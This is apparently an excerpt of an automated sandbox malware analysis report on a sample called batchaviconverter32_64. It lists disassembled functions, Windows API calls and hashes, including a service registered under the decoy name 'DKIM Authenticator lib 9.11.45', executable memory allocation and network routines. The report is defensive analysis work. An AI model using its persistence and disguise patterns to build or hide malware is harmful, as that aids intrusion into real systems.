                                                              Function 0040B2D3 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: ManagerOpen
                                                              • String ID:
                                                              • API String ID: 1889721586-0
                                                              • Opcode ID: fb50a67e83c14e0e169a45160d1509e417380c4981eb8e0e7061b8ae233626b2
                                                              • Instruction ID: b5ff5ccd1d8ad79b52359c6b0501e9828669fcbd3c28c983163a8553bf7430bf
                                                              • Opcode Fuzzy Hash: fb50a67e83c14e0e169a45160d1509e417380c4981eb8e0e7061b8ae233626b2
                                                              • Instruction Fuzzy Hash: 1CA001A0159406AED2916B605EED83A259E994034A3610836A203A40E0867A4C56AD7F
                                                              Function 02DBF4B6 Relevance: 1.5, APIs: 1, Instructions: 5fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileA.KERNEL32(000000E6), ref: 02DBF4BC
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002DBA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DBA000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dba000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 5c1339336bce6bd91ad901ad46bd6a9b8ba40ef150e652d889b85a1b8ceaf025
                                                              • Instruction ID: 5e4b20724296884362096620009c623506009cff1127a309192cad944248993f
                                                              • Opcode Fuzzy Hash: 5c1339336bce6bd91ad901ad46bd6a9b8ba40ef150e652d889b85a1b8ceaf025
                                                              • Instruction Fuzzy Hash: EFB0123384C204CF92445640CC0ED543770B905211B140220A013423E0F6505C008542
                                                              Function 0040B902 Relevance: 1.5, APIs: 1, Instructions: 3registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: fc29cdd59cc1f60a843e892c59c3bce5da0c7b4d797c76b2cd3eef584fbfea33
                                                              • Instruction ID: 4d469e8581fb7edb61682280f78a10ab54891c46452e293fdf97ed303fbf583c
                                                              • Opcode Fuzzy Hash: fc29cdd59cc1f60a843e892c59c3bce5da0c7b4d797c76b2cd3eef584fbfea33
                                                              • Instruction Fuzzy Hash: 62900430344101DFF3104F715F4C31535DC55047457110475D707F10D0D774C015551D
                                                              Function 02DBFA3A Relevance: 1.5, APIs: 1, Instructions: 2fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002DBA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DBA000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dba000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 9f18025afd88916d2665759027bb32028c9d7f02ff3c476a0b37f8ea8da89afe
                                                              • Instruction ID: 7703e7cb1e724ca5c7701d1e7990fd407afd39307150818d6388e50d32ac880f
                                                              • Opcode Fuzzy Hash: 9f18025afd88916d2665759027bb32028c9d7f02ff3c476a0b37f8ea8da89afe
                                                              • Instruction Fuzzy Hash:
                                                              Function 0040264C Relevance: 1.3, APIs: 1, Instructions: 18memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0040B7B5
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 0e99515d809016a191a9d1f9480ae38e20174d825c6b328399fa96da3bd4fe5f
                                                              • Instruction ID: 0f736fba878ff0e935acd360bd96245de1721678441149802ece6dcd8f1625c1
                                                              • Opcode Fuzzy Hash: 0e99515d809016a191a9d1f9480ae38e20174d825c6b328399fa96da3bd4fe5f
                                                              • Instruction Fuzzy Hash: 2DD09737104212BBE3080E508DA5B543B67FB94BC0F22003AEB03376C0A7B69851D7CB
                                                              Function 0040275D Relevance: 1.3, APIs: 1, Instructions: 5sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 2af1d514474a7dea83df63868d0e81c3db74e4bd0b8ef448e5b03a3c5012fe89
                                                              • Instruction ID: 87374c4478fdb236f8d826cf14729e88be7d10b16993dd576865df85b41b0098
                                                              • Opcode Fuzzy Hash: 2af1d514474a7dea83df63868d0e81c3db74e4bd0b8ef448e5b03a3c5012fe89
                                                              • Instruction Fuzzy Hash: 56A01120A88302A2E2000BA02C0AB282020BB00B00F20002B2303388C082BC00033A8F
                                                              Function 0040B44F Relevance: 1.3, APIs: 1, Instructions: 3sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 1fe82211f58c4d4f1099d4034584c1cfa4f19cce5f0d0485685b27bddf880e93
                                                              • Instruction ID: 5c98b9bc7163b92cf8844e93d7975e39b2843cb567a211c80d699d2720ce2c87
                                                              • Opcode Fuzzy Hash: 1fe82211f58c4d4f1099d4034584c1cfa4f19cce5f0d0485685b27bddf880e93
                                                              • Instruction Fuzzy Hash: DEA00271445901EBC7454B60AA0C968BB31F7043053560269E54364460C73A5536EB8D

                                                              Non-executed Functions

                                                              Function 0040273F Relevance: 6.0, APIs: 4, Instructions: 21serviceCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateServiceA.ADVAPI32 ref: 0040273F
                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 0040B24E
                                                              • CloseServiceHandle.ADVAPI32(?), ref: 0040B8E4
                                                              • CloseServiceHandle.ADVAPI32(?), ref: 0040BAA2
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: Service$CloseHandle$Create
                                                              • String ID:
                                                              • API String ID: 2095555506-0
                                                              • Opcode ID: 3772de51581073650ac9654a5d400be238f07d097025b7825f37d2b6d7cfea42
                                                              • Instruction ID: 90891978d3190901301319106e4646f9dc10c153fd31ea45c640ea8e25af6178
                                                              • Opcode Fuzzy Hash: 3772de51581073650ac9654a5d400be238f07d097025b7825f37d2b6d7cfea42
                                                              • Instruction Fuzzy Hash: F7E08C30A88014D6DA24AB504D4C8AD3A34E700304B354076D00B7A0D0C73EAE52FEAE
                                                              Function 02D908A8 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02D908D2
                                                              • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02D908DA
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorFormatLastMessage
                                                              • String ID:
                                                              • API String ID: 3479602957-0
                                                              • Opcode ID: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
                                                              • Instruction ID: 03b7b4f479114b0cbf68670eaa32ef6cb9e2890e1afe14117dc54fe0007d4db8
                                                              • Opcode Fuzzy Hash: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
                                                              • Instruction Fuzzy Hash: 68F09A30308301DFEB24CA25C851B2EBBE4AB9C745F54092CF69692291E370E581CF5A
                                                              Function 02D99458 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,02D94DC6,?,?,?,00000001), ref: 02D9945D
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 02D99466
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: e0eacae0242e1e5faf590052052bcae401a8f098aee6db5c0530e5f02416657f
                                                              • Instruction ID: 985ca834110de4d28dac166a223b26c0e480c538823d3516225f17fd21feffa8
                                                              • Opcode Fuzzy Hash: e0eacae0242e1e5faf590052052bcae401a8f098aee6db5c0530e5f02416657f
                                                              • Instruction Fuzzy Hash: 9FB092324C4208EBEB012B91EC0AF8DBF38EB04662F104810F60D44290CB6258219AA9
                                                              Function 004021F8 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040B1E7
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: CtrlDispatcherServiceStart
                                                              • String ID:
                                                              • API String ID: 3789849863-0
                                                              • Opcode ID: 9fce92389dee86bdaadd48ad1fa97b9ef5a8344f47219d14ed2d554c962dbdbe
                                                              • Instruction ID: 5628e6816dd4cdc2200e07d29d33549c9cbd26bb2940077c2d0ad821dd692931
                                                              • Opcode Fuzzy Hash: 9fce92389dee86bdaadd48ad1fa97b9ef5a8344f47219d14ed2d554c962dbdbe
                                                              • Instruction Fuzzy Hash: 82D01270C0C645DFEB10CB5085989793B78E705385F24C0B7981B7A0C1C73C8516EA4E
                                                              Function 0040B173 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040B1E7
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: CtrlDispatcherServiceStart
                                                              • String ID:
                                                              • API String ID: 3789849863-0
                                                              • Opcode ID: 7e16860faa1408c7c55987ee4ca1ba6a2a54c48f9f8a63b0668f5852601dbab4
                                                              • Instruction ID: 1208425d594af506da73105ee3485c40963d8588f0119b6f43d7770bf72bb54f
                                                              • Opcode Fuzzy Hash: 7e16860faa1408c7c55987ee4ca1ba6a2a54c48f9f8a63b0668f5852601dbab4
                                                              • Instruction Fuzzy Hash: F0B09230C0C20587CB049AD489888B9363CE6062557105972942BB1080D77881279549
                                                              Function 0040235E Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 93registrysynchronizationthreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32 ref: 0040238D
                                                              • SetServiceStatus.ADVAPI32(0040A0E0), ref: 0040239E
                                                              • SetEvent.KERNEL32 ref: 004023AA
                                                              • RegisterServiceCtrlHandlerA.ADVAPI32(DKIM Authenticator lib 9.11.45,0040235E), ref: 004023C1
                                                              • SetServiceStatus.ADVAPI32(0040A0E0), ref: 00402420
                                                              • GetLastError.KERNEL32 ref: 00402422
                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
                                                              • GetLastError.KERNEL32 ref: 00402450
                                                              • SetServiceStatus.ADVAPI32(0040A0E0), ref: 00402480
                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
                                                              • CloseHandle.KERNEL32 ref: 004024A1
                                                              • SetServiceStatus.ADVAPI32(0040A0E0), ref: 004024CA
                                                              Strings
                                                              • DKIM Authenticator lib 9.11.45, xrefs: 004023BC
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: Service$Status$ErrorLast$CreateEvent$CloseCtrlHandleHandlerObjectRegisterSingleThreadWait
                                                              • String ID: DKIM Authenticator lib 9.11.45
                                                              • API String ID: 1146649175-992513482
                                                              • Opcode ID: dde84ccb3db8421524e4956b5ba65e4b5966ca61601a6f30d71ab06ccbec0c6b
                                                              • Instruction ID: 50cf42f73b490f19b5de10854d6e10100ea54590a44505af00a79cc1c0070098
                                                              • Opcode Fuzzy Hash: dde84ccb3db8421524e4956b5ba65e4b5966ca61601a6f30d71ab06ccbec0c6b
                                                              • Instruction Fuzzy Hash: D7310970841309EBD710DF16EF49A567FA8EB85755B11C03BE206B22B0D7BA0464EB2E
                                                              Function 02D81CF8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 105synchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D81D11
                                                              • GetLastError.KERNEL32 ref: 02D81D23
                                                                • Part of subcall function 02D81712: __EH_prolog.LIBCMT ref: 02D81717
                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D81D59
                                                              • GetLastError.KERNEL32 ref: 02D81D6B
                                                              • __beginthreadex.LIBCMT ref: 02D81DB1
                                                              • GetLastError.KERNEL32 ref: 02D81DC6
                                                              • CloseHandle.KERNEL32(00000000), ref: 02D81DDD
                                                              • CloseHandle.KERNEL32(00000000), ref: 02D81DEC
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D81E14
                                                              • CloseHandle.KERNEL32(00000000), ref: 02D81E1B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                              • String ID: thread$thread.entry_event$thread.exit_event
                                                              • API String ID: 831262434-3017686385
                                                              • Opcode ID: 01bd6754a9523608e0da20f1b5667ec8aa9a8a39e60f242b5cd88ea84202400f
                                                              • Instruction ID: ac5314de943c4bf5240c7dc893688e7895c0fe565d95b64622b31c938f3f0c34
                                                              • Opcode Fuzzy Hash: 01bd6754a9523608e0da20f1b5667ec8aa9a8a39e60f242b5cd88ea84202400f
                                                              • Instruction Fuzzy Hash: 78316A71A043019FE700EF20C849B2FBBA5EB84715F10496DF9598B391EB70DC4ACBA2
                                                              Function 02D824E1 Relevance: 21.2, APIs: 14, Instructions: 173COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D824E6
                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02D824FC
                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02D8250E
                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02D8256D
                                                              • SetLastError.KERNEL32(00000000,?,7591DFB0), ref: 02D8257F
                                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,7591DFB0), ref: 02D82599
                                                              • GetLastError.KERNEL32(?,7591DFB0), ref: 02D825A2
                                                              • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D825F0
                                                              • InterlockedDecrement.KERNEL32(00000002), ref: 02D8262F
                                                              • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02D8268E
                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D82699
                                                              • InterlockedExchange.KERNEL32(00000000,00000001), ref: 02D826AD
                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,7591DFB0), ref: 02D826BD
                                                              • GetLastError.KERNEL32(?,7591DFB0), ref: 02D826C7
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                              • String ID:
                                                              • API String ID: 1213838671-0
                                                              • Opcode ID: 3d9753ab6494b334abd9de735f17bec3fee4eb452d5c7b321ee2c12787a7c98a
                                                              • Instruction ID: faaa1ad114ae4e792e3de75452d8c5fedc3ec62b79d5a7daeafc86ab2e3c8452
                                                              • Opcode Fuzzy Hash: 3d9753ab6494b334abd9de735f17bec3fee4eb452d5c7b321ee2c12787a7c98a
                                                              • Instruction Fuzzy Hash: DA611871900249AFDB10EFA4D989EAEBBB9FF08314F10496AE956E3340D734AD54CF64
                                                              Function 02D84603 Relevance: 19.9, APIs: 13, Instructions: 442networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D84608
                                                                • Part of subcall function 02D93A7C: _malloc.LIBCMT ref: 02D93A94
                                                              • htons.WS2_32(?), ref: 02D84669
                                                              • htonl.WS2_32(?), ref: 02D8468C
                                                              • htonl.WS2_32(00000000), ref: 02D84693
                                                              • htons.WS2_32(00000000), ref: 02D84747
                                                              • _sprintf.LIBCMT ref: 02D8475D
                                                                • Part of subcall function 02D888BE: _memmove.LIBCMT ref: 02D888DE
                                                              • htons.WS2_32(?), ref: 02D846B0
                                                                • Part of subcall function 02D89669: __EH_prolog.LIBCMT ref: 02D8966E
                                                                • Part of subcall function 02D89669: RtlEnterCriticalSection.NTDLL(00000020), ref: 02D896E9
                                                                • Part of subcall function 02D89669: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D89707
                                                                • Part of subcall function 02D81BA7: __EH_prolog.LIBCMT ref: 02D81BAC
                                                                • Part of subcall function 02D81BA7: RtlEnterCriticalSection.NTDLL ref: 02D81BBC
                                                                • Part of subcall function 02D81BA7: RtlLeaveCriticalSection.NTDLL ref: 02D81BEA
                                                                • Part of subcall function 02D81BA7: RtlEnterCriticalSection.NTDLL ref: 02D81C13
                                                                • Part of subcall function 02D81BA7: RtlLeaveCriticalSection.NTDLL ref: 02D81C56
                                                                • Part of subcall function 02D8DE25: __EH_prolog.LIBCMT ref: 02D8DE2A
                                                              • htonl.WS2_32(?), ref: 02D8497C
                                                              • htonl.WS2_32(00000000), ref: 02D84983
                                                              • htonl.WS2_32(00000000), ref: 02D849C8
                                                              • htonl.WS2_32(00000000), ref: 02D849CF
                                                              • htons.WS2_32(?), ref: 02D849EF
                                                              • htons.WS2_32(?), ref: 02D849F9
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
                                                              • String ID:
                                                              • API String ID: 1645262487-0
                                                              • Opcode ID: bffe3a1231a8a7b05d08b49728d36b816b1ef6feecb022e70b2a8e162b341281
                                                              • Instruction ID: cb3acfb1b081a13f791c0239e3720c56b31552410671ef3696246963cf3dd961
                                                              • Opcode Fuzzy Hash: bffe3a1231a8a7b05d08b49728d36b816b1ef6feecb022e70b2a8e162b341281
                                                              • Instruction Fuzzy Hash: A8022571D0025EEEEF15EBA4D844BEEBBB9EF08304F10455AE505A7280DB746E49CFA1
                                                              Function 02D98262 Relevance: 18.1, APIs: 12, Instructions: 84COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlDecodePointer.NTDLL(?), ref: 02D9826A
                                                              • _free.LIBCMT ref: 02D98283
                                                                • Part of subcall function 02D92EA4: HeapFree.KERNEL32(00000000,00000000,?,02D95C02,00000000,00000104,75920A60), ref: 02D92EB8
                                                                • Part of subcall function 02D92EA4: GetLastError.KERNEL32(00000000,?,02D95C02,00000000,00000104,75920A60), ref: 02D92ECA
                                                              • _free.LIBCMT ref: 02D98296
                                                              • _free.LIBCMT ref: 02D982B4
                                                              • _free.LIBCMT ref: 02D982C6
                                                              • _free.LIBCMT ref: 02D982D7
                                                              • _free.LIBCMT ref: 02D982E2
                                                              • _free.LIBCMT ref: 02D98306
                                                              • RtlEncodePointer.NTDLL(0074E218), ref: 02D9830D
                                                              • _free.LIBCMT ref: 02D98322
                                                              • _free.LIBCMT ref: 02D98338
                                                              • _free.LIBCMT ref: 02D98360
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 3064303923-0
                                                              • Opcode ID: 5d705446e13bf2c9167e55d1bf84174f7d99005faa7a2cdd0d1971c815d74685
                                                              • Instruction ID: b64d6e6210be20decabbb7c83fc638d26f90a1e43b71110736d54c715bcc421f
                                                              • Opcode Fuzzy Hash: 5d705446e13bf2c9167e55d1bf84174f7d99005faa7a2cdd0d1971c815d74685
                                                              • Instruction Fuzzy Hash: 4F217C72D41210EFCF266F26E89451A77ADEF46B20729482AF804D7340C735DC65EFA0
                                                              Function 02D84D86 Relevance: 16.8, APIs: 11, Instructions: 256COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D84D8B
                                                              • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D84DB7
                                                              • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D84DC3
                                                                • Part of subcall function 02D84BED: __EH_prolog.LIBCMT ref: 02D84BF2
                                                                • Part of subcall function 02D84BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02D84CF2
                                                              • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D84E93
                                                              • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D84E99
                                                              • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D84EA0
                                                              • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D84EA6
                                                              • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D850A7
                                                              • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D850AD
                                                              • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D850B8
                                                              • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D850C1
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                              • String ID:
                                                              • API String ID: 2062355503-0
                                                              • Opcode ID: 94b3dc5536eede06d2f1689dafa36bd4f43c1d9bb721285dc05f906a75796815
                                                              • Instruction ID: d7e58307326a7b0f753494b3164c06ea088816debf8d08326090d0f576a1cbee
                                                              • Opcode Fuzzy Hash: 94b3dc5536eede06d2f1689dafa36bd4f43c1d9bb721285dc05f906a75796815
                                                              • Instruction Fuzzy Hash: E9B11871D0425EDFEF25EFA0D840BEEBBB5AF04314F24405AE805A6280DB755E49CFA5
                                                              Function 0040359E Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 132COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 004035B9
                                                              • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 004035CD
                                                              • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 004035F9
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402DE4), ref: 00403631
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402DE4), ref: 00403653
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402DE4), ref: 0040366C
                                                              • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 0040367F
                                                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004036BD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                              • String ID: -@
                                                              • API String ID: 1823725401-2999422947
                                                              • Opcode ID: d09c44be7b725e9416f1bbabc7ff939c5033ef1a694eb4ed66286c613d9d8241
                                                              • Instruction ID: a052efc5f8264b04540ba139265ff63877c4dc4e75c0ae38b6650f7b3518fcca
                                                              • Opcode Fuzzy Hash: d09c44be7b725e9416f1bbabc7ff939c5033ef1a694eb4ed66286c613d9d8241
                                                              • Instruction Fuzzy Hash: 7A31F0B24042217EDB303F785C8883B7E9CE64574A7120D3BF542E3390E67A8E814AAD
                                                              Function 02D83423 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 94libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D83428
                                                              • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02D8346B
                                                              • GetProcAddress.KERNEL32(00000000), ref: 02D83472
                                                              • GetLastError.KERNEL32 ref: 02D83486
                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02D834D7
